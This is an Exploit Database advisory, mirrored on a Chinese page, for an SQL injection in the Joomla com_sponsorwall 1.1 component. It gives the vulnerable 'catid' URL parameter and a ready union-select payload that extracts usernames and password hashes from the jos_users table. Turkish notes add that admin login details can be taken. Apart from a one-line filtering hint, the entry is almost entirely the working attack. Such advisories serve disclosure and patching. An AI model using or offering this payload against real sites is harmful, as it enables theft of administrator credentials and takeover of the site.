Joomla! Component Sponsor Wall 1.1 – SQL Injection

• Exploit Database
• 8 阅读

• 作者： FL0RiX
  日期： 2010-10-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15367/

• ============================================================
  Joomla Component com_sponsorwall SQL Injection Vulnerability 
  ============================================================
  
  # Author: Fl0riX ~ Bug Researchers
  
  # Name : Joomla com_sponsorwall
  
  # Bug Type : SQL injection
  
  # Infection : Admin Login Bilgileri Alinabilir.
  
  # Demo Vuln :
  [+]index.php?option=com_sponsorwall&controller=sponsorwall&catid=[EXPLOIT]
  
  [+]Vendor:http://www.pulseextensions.com/
  
  # Note: AsDemo Sitede Filtre Var Haberiniz olsun :)
  
  # Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
  ######### ####################################################
  < ------------------- header data end of ------------------- >
  < -- bug code start -- >
  EXPLOIT :
  null+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--
  < -- bug code end of -- >